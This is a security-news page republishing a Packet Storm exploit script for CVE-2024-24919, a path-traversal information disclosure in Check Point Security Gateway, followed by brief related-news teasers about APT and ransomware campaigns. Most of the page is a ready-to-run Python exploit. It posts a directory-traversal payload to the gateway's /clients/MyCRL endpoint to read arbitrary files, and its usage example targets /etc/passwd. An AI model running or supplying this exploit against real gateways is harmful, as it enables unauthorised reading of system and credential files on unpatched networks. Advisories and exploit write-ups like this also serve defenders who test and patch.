Security
Headlines
HeadlinesLatestCVEs

Headline

Check Point Security Gateway Information Disclosure

Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.

Packet Storm
#vulnerability#windows#js#git#auth#firefox
# Exploit Title:  Check Point Security Gateway - Information Disclosure (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919from requests import Request, Sessionimport sysimport jsondef title():    print('''       _______      ________    ___   ___ ___  _  _        ___  _  _   ___  __  ___    / ____\ \    / /  ____|  |__ \ / _ \__ \| || |      |__ \| || | / _ \/_ |/ _ \  | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______/ /|__   _\__, || |\__, | | |____   \  /  | |____    / /_| |_| / /_   | |       / /_   | |   / / | |  / /   \_____|   \/   |______|  |____|\___/____|  |_|      |____|  |_|  /_/  |_| /_/                                                                                                                                                                                                                                                                                                                                                                 Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/    ''')   def exploit(url, path):  url = url + '/clients/MyCRL'  data =   "aCSHELL/../../../../../../../../../../.."+ path  headers = {            'Connection': 'keep-alive',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'  }  s = Session()  req = Request('POST', url, data=data, headers=headers)  prepped = req.prepare()  #del prepped.headers['Content-Type']  resp = s.send(prepped,      verify=False,      timeout=15  )    print(prepped.headers)  print(url)  print(resp.headers)  print(resp.status_code)if __name__ == '__main__':    title()    if(len(sys.argv) < 3):      print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))      print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0]))            exit(0)    else:      exploit(sys.argv[1],sys.argv[2])

Related news

Chinese Hackers Exploit Visual Studio Code in Southeast Asian Cyberattacks

The China-linked advanced persistent threat (APT) group known as Mustang Panda has been observed weaponizing Visual Studio Code software as part of espionage operations targeting government entities in Southeast Asia. "This threat actor used Visual Studio Code's embedded reverse shell feature to gain a foothold in target networks," Palo Alto Networks Unit 42 researcher Tom Fakterman said in a

U.S. Agencies Warn of Iranian Hacking Group's Ongoing Ransomware Attacks

U.S. cybersecurity and intelligence agencies have called out an Iranian hacking group for breaching multiple organizations across the country and coordinating with affiliates to deliver ransomware. The activity has been linked to a threat actor dubbed Pioneer Kitten, which is also known as Fox Kitten, Lemon Sandstorm (formerly Rubidium), Parisite, and UNC757, which it described as connected to

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution